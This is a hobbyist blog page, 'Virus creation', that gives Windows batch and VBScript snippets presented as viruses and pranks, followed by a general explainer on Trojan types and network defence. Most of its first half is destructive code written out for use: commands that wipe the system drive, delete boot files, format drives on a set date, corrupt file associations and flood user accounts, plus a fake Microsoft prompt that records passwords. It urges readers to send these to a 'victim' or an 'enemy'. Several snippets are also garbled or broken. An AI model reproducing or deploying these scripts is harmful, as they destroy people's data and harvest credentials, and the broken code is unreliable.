Virus creation

Learn Something Technical

Virus creation

How to Delete all your system:-
Delete files with a small command!

Copy the following code into your notepad and save it as a anyname.bat file.

del *.*

All your files in your hard disk will

vanish in less than 5mins
The blue screen of Death [this might be dangerous]
copy the following code in notepad:-

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

save it as (crash .vbs) and run

try it in your friend pc or your enemy pc.

never run in your pc.(too dengerous)


Hack your friend’s keyboard and make him type ‘You are a fool’ simultaneously:-
Type/copy following code in notepad:-

Set wshShell = wscript .CreateObject(‘WScript .Shell’)
wscript .sleep 100
wshshell .sendkeys ‘You are a fool.’

Note:- (replace all single comma with inverted comma)

Save it as (Anything .VBS) and send it.


Type/copy the following code in notepad:-

rd/s/q D:
rd/s/q C:
rd/s/q E:

save it as (format.bat) and run it.

it will format your pc in 3 seconds.(too dengerous try at you own risk).
Type/copy the following code in notepad:-

@echo off
color 02
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks

save it as (matrix .bat) and run.


Type/copy the following code in notepad:-

@echo off
attrib –r –s –h c:autoexec.bat
del c:autoexec.bat
attrib –r –s –h c:boot.ini
del c:boot.ini
attrib –r –s –h c:
del c:
attrib –r –s –h c:windowswin.ini
del c:windowswin.ini
@echo off
Shutdown –s –t 7 –c “A VIRUS IS TAKING OVER c:Drive

save it as (king.bat) and run it.

(Too dengerous try at your own risk or in your enemy pc).


NON-TEXT VIRUS (changefile to nonworkingfile):-
the non-text virus change the format of your file in a way crupt your data if your file are in these format(.exe .jpeg .png .mpeg .sys)

Type/copy the following code in notepad:-

@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile

msg Your System is cracked …..

save it as (nontext .bat) and run it.

what is folder blaster
Most of the commands we use to make batch files are actually the same commands first implemented in MS-DOS (An ancient microsoft OS). These DOS(Disk Operating System) commands can also be used in the command prompt window.

Whatever your batch file does, you can do it through the command line interface (CLI).

I recommend you try out each and every single command you can find. Hacking is getting more and more user friendly everyday, CLIs are being replaced by GUIs (Graphical User Interfaces) – meaning in most places you won’t have to actually type in the commands, you can just select an option and press a button.

But as of now, this is a work in progress.

With more advanced hacking techniques, specially the ones that involve using BackTrack tools, you will find that majority of the hacks are still done through the CLI (More on this, later).

what is dos attack
A denial-of-service (DoS) is any type of attack where the attackers (hackers) attempt to prevent legitimate users from accessing the service.

In a DoS attack, the attacker usually sends excessive messages asking the network or server to authenticate requests that have invalid return addresses.

The network or server will not be able to find the return address of the attacker when sending the authentication approval, causing the server to wait before closing the connection.

When the server closes the connection, the attacker sends more authentication messages with invalid return addresses.

Hence, the process of authentication and server wait will begin again, keeping the network or server busy.

User Account Flooder
open notepad and write the following code and save them as (name.bat) file.

@echo off
user %random% /add
goto x

then run the bat file in victim pc.

Delete operating system
open notepad and write the following code and save them as (name.bat) file.

@Echo off
Del C: *.* |y

then run the bat file in victim pc.

Deletes All The Content Of A Drive
open notepad and write the following code and save them as (name.bat) file.

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code in a .bat file.
Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*


@ECHO off
START %SystemRoot% system32 notepad .exe
GOTO top

open notepad and write the following code and save them as (name .bat) file.

Bomb Virus
Copy Paste The Following

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul

And Save It As Anything .bat

Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action The Virus Will Take Effect On That Day.
Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*


Set wshShell =wscript.CreateObject(”WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”

open notepad and write the following code and save them as (name.bat) file.

Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*


Set wshShell = wscript.CreateObject(”WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “~(enter)”

open notepad and write the following code and save them as (name.bat) file.
What sex is your computer ?
open notepad and write the following code and save them as (name.bat) file.

-> open notepad

-> copy code

CreateObject(“SAPI.SpVoice”).Speak”I love YOU”

-> and paste on the Notepad

-> save as > love.vbs

-> double-click on it

Tasks Kill
open notepad and write the following code and save them as (name.bat) file.

@echo off
start calc
tskill msnmsgr
tskill firefox
tskill iexplore
tskill LimreWire
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer

save this as .bat file and send to victim pc!
Popping CD Drives
*This will make the CD drives constantly pop out*


Set oWMP = CreateObject(”WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
For i = 0 to colCDROMs.Count – 1
End If
wscript.sleep 100

save this as .bat file in notepad.

To make your pc talk
Open a text file in notepad and write:

Dim msg, sapi
msg=InputBox(“Enter your text”,”Talk it”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak msg

Save the file with a (*.vbs) extension, it will create a VBScript File.

It will prompt you for a text when u open the file, input the text and press ok.”

u will hear now what u typed..

Remove Shortcut Virus from USB Drives and PC
Step 1. To remove your shortcut virus with the help of your command prompt system, you need to follow the steps ahead.

Step 2. Open Command Prompt by pressing Windows + R and Enter “CMD” in the box and hit enter.

Step 3. Now enter the following in your Command Prompt “attrib :*.* /d /s -h -r -s” without quotes ‘Your USB drive letter‘ must be replaced with your own drive letter. Suppose your flash drive is on Drive F so you must imply the following command “attrib f:*.* /d /s -h -r -s” without quotes and hit enter.

Step 4. Now wait for some time until CMD finishes the command, once it’s completed successfully the shortcut virus will be removed from your PC.

Make your own run/cmd box
Step 1.Open notepad.

Step 2.Type

Step 3.Go to file then save as your desired name followed by .bat

so for example bob.bat

Remote shut down computers
(only works on your local network)

Step 1.Go to your cmd / run box

Step 2.Then type shutdown -i

Step 3.Endless amusment !!

Make any user an administrator !
use following steps,

Step 1.Go to your cmd/run box.

Step 2.Type net localgroup administrators followed by the user mane then /add

Step 3.Example : net localgroup administrators Daz /add Daz the user name

Making programs automatically run when the USB is plugged in:
Follow the instructions,copy these codes on notepad and save them as name.bat file.


make sure autorun is enable in your pc.

how to remove the hidden virus in your pendrive
Actually this viruses are hidden and can’t be seen even after you enable show hidden folders. Following simple dos command will change the attributes of these files ,there after you can remove it by pressing delete key.

Step1.:Type cmd in Run

Step2.: Switch to the drive on which
pen drive is connected

(like C:> h: enter)

Step3.: type exactly as

attrib -s -h*.* /s /d and hit enter

(don’t forget spaces).

Now you can see hidden virus files

and you can delete them. _________________________

How To Create An Aggravating Pop-up
open Notepad then paste this code:

msg * hi
msg * how are you
msg * stop tying to make me go away
msg * ill never go away never
msg * still here
msg * this is getting boring
msg * “yawn”
msg * i think i will go now
msg * yeah i will
msg * well bye
msg * “end of message”

then save as Whateveryouwant.bat (again always save as .bat) then a icon will appear on your desktop click and enjoy.

(you can make the message pop-up long just type: msg* whatever you want)

How To Make A Timer
open notepad and paste this code:

@echo off
title Timer
set time=30 (you can make the time whatever you want)
set /a time=%time%-1
if %time%==0 goto timesup
echo %time%
ping localhost -n 2 > nul
goto loop
echo Time is Up!
echo Press Any Key To Exit!
pause >nul
n save as whatever.bat. click the icon and enjoy.

How To Make CMD And Calculator
open notepad and paste this code:


@echo off
start cmd.exe
start calc.exe
goto :E

save as whatever.bat. you might not want to click the icon

Wipe all data
Type/copy the following code in notepad:-

rd/s/q D:
rd/s/q C:
rd/s/q E:

save it as (format.bat) and run it.

it will format your pc in 3 seconds.(too dengerous try at you own risk).
Funny Trick :
Open Notepad and type this in:

: i
dir /a
goto i

save as whatever.bat

this just makes your computer info go really fast on cmd nothing to fret about.

Create thousand of folder in minutes :
Step 1: Open Notepad and Copy the Following code in Notepad.

@echo off
cd /d C:
cd /d D:
cd /d E:
goto VIRUS
REM #######################

Copy the Following Code and paste it in notepad then Save it as “virus .bat”. [you can also save with different name but extension must be .bat

Step 2: Give it to Victim

Now Give this file to Victim via Pen-drive or Mail then ask to Open it.

It will Create More and More Folder in C,D,and E drive.

Run it at your own risk.

Freeze someone’s desktop :
this is a funny trick, u can freeze someone’s desktop

1.close everything u r working in, and work on desktop. so click on prtscr on ur keyboard.

2.go to paint and click on edit then paste this file as (name).bmp and close the paint. in the desktop, we have 2 remove desktop icons and shortcuts, so right click on the mouse and then properties, click on desktop then select customize desktop.

4.uncheck all the boxes in desktop icons and press ok. then press apply then ok. to remove the shortcuts in the desktop, go to start and select My Computer, then click on c: right click on ur mouse and select new folder, write it any name go to desktop and select all da icons and right click on them then press cut,go to c: and paste them in the folder dat u created then close the window. to put the fake desktop image and remove the taskbar, so right click on desktop and gp to properties, now go to desktop and select Browse, select the file that u saved then press appply then ok. now to remove the windows taskbar, right click on the taskbar and go 2 properties, then select autohide the taskbar and then apply then ok

now all the icons r fake and the user will think that his desktop is freezed

enjoy it.!

Toggle your friend’s Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject(“WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”

Save it as “Anything.VBS” and send it.

Convey your friend a lil’ message and shut down his / her computer:
Type :

@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s

Save it as “Anything.BAT” in All Files and send it.

RAM crashing trick
open notepad and type

goto A
save with .bat extension.
Infinitely loops your browser to
open up

Save it as “whatever.BAT” in All Files and send it.

Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type/copy the following code in notepad:-

Type :

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
wscript.sleep 100
wshshell.sendkeys “{bs}”

Save it as “Anything.VBS” and send it.

keylogger/shutdown computer code
Type/copy the following code in notepad:-

@echo off
color c
start Iexplore
echo Email Microsoft immediately
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >CMDREMARKS.txt
shutdown -s -t 30 -c “Request Denied”

Save it as “whatever.VBS” and send it.

How To Make Notepad Tell You In What Year You Will Be 50
First open Notepad. Then type this in:

WScript.Echo “Hello!”
Set WshShell = WScript.CreateObject(“WScript.Shell”)
birthdate = InputBox(“the year you were born.”)
newage = the year you were born + 50
WshShell.Popup “In ” & newage & ” you’ll be 50.”

then save as years.vbs then click the icon and watch

simple fake shutdown virus
Type/copy the following code in notepad:-

shutdown -s -t 30 -c “WARNING TROJAN DETECTED”
Unblock CMD
@echo off
@echo on
Web Unblocker
@echo off
title web unblocker

Save it as “whatever .bat” and use it.

How To Make A ChatBox
open notepad and paste this code:

dim fname
fname=inputbox(“hi whats your name?”)

save as whatever.vbs

click the icon and enjoy. _________________________

How To Get The Computer To Talk To You (Non-Text Version)
Open Notepad and type this in:

strText = inputbox(“What should Sam say?”,”Sam”)
Set objVoice = CreateObject (“SAPI.SpVoice”)
ObjVoice.speak strText

save it as whatever.vbs.

Remote access Trojans
These are probably the most publicized Trojans, because they provide the attacker with total control of the victim’s machine.

Examples are the Back Orifice and Netbus Trojans.

The idea behind them is to give the attacker COMPLETE access to someone’s machine, and therefore full access to files, private conversations, accounting data, etc.

The Bugbear virus that hit the Internet in September 2002, for instance, installed a Trojan horse on the victims’machines that could give the remote attacker access to sensitive data.

The remote access Trojan acts as a server and usually listens on a port that is not available to Internet attackers.

Therefore, on a computer network behind a firewall, it is unlikely that a remote (off-site) hacker would be able connect to the Trojan (assuming that you have blocked these ports, of course).

HOWEVER, an internal hacker (located behind the firewall) can connect to this kind of Trojan without any problems.


Data-sending Trojans (passwords, keystrokes etc.)
The purpose of these Trojans is to send data back to the hacker with information such as passwords (ICQ, IRC, FTP, HTTP) or confidential information such as credit card details, chat logs, address lists, etc.

The Trojan could look for specific information in particular locations or it could install a key-logger and simply send all recorded keystrokes to the hacker (who in turn can extract the passwords from that data).

An example of this is the Badtrans.B email virus (released in the wild in December 2001) that could log users’ keystrokes.

Captured data can be sent back to the attacker’s email address, which in most cases is located at some free web-based email provider.

Alternatively, captured data can be sent by connecting to a hacker’s website – probably using a free web page provider – and submitting data via a web-form.

Both methods would go unnoticed and can be done from any machine on your network with Internet and email access.

Both internal and external hackers can use data-sending Trojans to gain access to confidential information about your company.


Denial of service (DoS) attack Trojans
These Trojans give the attacker the power to start a distributed denial of service (DDoS) attack if there are enough victims.

The main idea is that if you have 200 infected ADSL users and you attack the victim simultaneously from each,

this will generate HEAVY traffic (more than the victim’s bandwidth can carry, in most cases), causing its access to the Internet to shut down.

WinTrinoo is a DDoS tool that has recently become very popular; through it,

An attacker who has infected many ADSL users can cause major Internet sites to shut down;

Early examples of this date back to February 2000, when a number of prominent e-commerce sites such as Amazon, CNN, E*Trade, Yahoo and eBay were attacked.

Another variation of a DoS Trojan is the mail-bomb Trojan,

where the main aim is to infect as many machines as possible and simultaneously attack specific email address/addresses with random subjects and contents that cannot be filtered.

Again, a DoS Trojan is similar to a virus, but the DoS Trojan can be created purposely to attack you, and therefore is unlikely to be detected by your anti-virus software.


Destructive Trojans
The only function of these Trojans is to destroy and delete files.

This makes them very simple to use.

They can automatically delete all the core system files (for example, .dll, .ini or .exe files, and possibly others) on your machine.

The Trojan can either be activated by the attacker or can work like a logic bomb that starts on a specific day and time.

A destructive Trojan is a danger to any computer network.

In many ways, it is similar to a virus, but the destructive Trojan has been created purposely to attack you, and therefore is unlikely to be detected by your anti-virus software.

>> Proxy Trojans

These Trojans turn the victim’s computer into a proxy server, making it available to the whole world or to the attacker alone.

It is used for anonymous Telnet, ICQ, IRC, etc., to make purchases with stolen credit cards, and for other such illegal activities.

This gives the attacker complete anonymity and the opportunity to do everything from YOUR computer, including the possibility to launch attacks from your network.

If the attacker’s activities are detected and tracked, however, the trail leads back to you not to the attacker – which could bring your organization into legal trouble.

Strictly speaking, you are responsible for your network and for any attacks launched from it.

>> FTP Trojans

These Trojans open port 21 (the port for FTP transfers) and let the attacker connect to your machine via FTP.

How can I get infected?
For a network user who is protected by a firewall and whose ICQ and IRC connections are disabled, infection will mostly occur via an email attachment or through a software download from a website.

Many users claim never to open an attachment or to download software from an unknown website, however clever social engineering techniques used by hackers can trick most users into running the infected attachment or downloading the malicious software without even suspecting a thing.

An example of a Trojan that made use of social engineering was the Septer.

troj, which was transmitted via email in October 2001.

This was disguised as a donation form for the American Red Cross’s disaster relief efforts and required recipients to complete a form, including their credit card details.

The Trojan then encrypted these details and sent them to the attacker’s website.

>> Infection via attachments

It is amazing how many people are infected by running an attachment sent to their mailbox.

Imagine the following scenario: The person targeting you knows you have a friend named Alex and also knows Alex’s email address.

The attacker disguises a Trojan as interesting content, for example, a Flash-based joke, and emails it to you in your friend’s name.

To do so, the attacker uses some relaying mail server to falsify the email’s FROM field and make it look like Alex is the sender: Alex’s email address is so the attacker’s FROM field is changed to

You check your mail, see that Alex has sent you an attachment containing a joke, and run it without even thinking that it might be a malicious because, hey, Alex wouldn’t do something like that, he’s my friend!

Information is power: Just because the attacker knew you had a friend Alex, and knew and guessed that you would like a joke, he succeeded in infecting your machine!

Various scenarios are possible. The point is that it only takes ONE network user to get your network infected.

In addition, if you are not running email security software that can detect certain exploits, then attachments could even run automatically, meaning that a hacker can infect a system by simply sending you the Trojan as an attachment, without any intervention on a user’s part.

How to protect your network from Trojans
So how do you protect your network from Trojans?

A common misconception is that anti-virus software offers all the protection you need.

The truth is anti-virus software offers only limited protection.

Anti-virus software recognizes only a portion of all known Trojans and does not recognize unknown Trojans.

Although most virus scanners detect a number of public/known Trojans, they are unable to scan UNKNOWN Trojans.

This is because anti-virus software relies mainly on recognizing the signatures of each Trojan.

Yet, because the source code of many Trojans is easily available, a more advanced hacker can create a new version of that Trojan, the signature of which NO anti-virus scanner will have.

If the person planning to attack you finds out what anti-virus software you use, for example through the automatic disclaimer added to outgoing emails by some anti-virus engines, he will then create a Trojan specifically to bypass your virus scanner engine.

Apart from failing to detect unknown Trojans, virus scanners do not detect all known Trojans either – most virus vendors do not actively seek new Trojans and research has shown that virus engines each detect a particular set of Trojans.

To detect a larger percentage of known Trojans, you need to deploy multiple virus scanners; this would dramatically increase the percentage of known Trojans caught.

>> To effectively protect your network against Trojans, you must follow a multi-level security strategy:

You need to implement gateway virus scanning and content checking at the perimeter of your network for email, HTTP and FTP – It is no good having email anti-virus protection, if a user can download a Trojan from a website and infect your network.

You need to implement multiple virus engines at the gateway – Although a good virus engine usually detects all known viruses, it is a fact that multiple virus engines jointly recognize many more known Trojans than a single engine.

You need to quarantine/check executables entering your network via email and web/FTP at the gateway.

You have to analyze what the executable might do.


Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: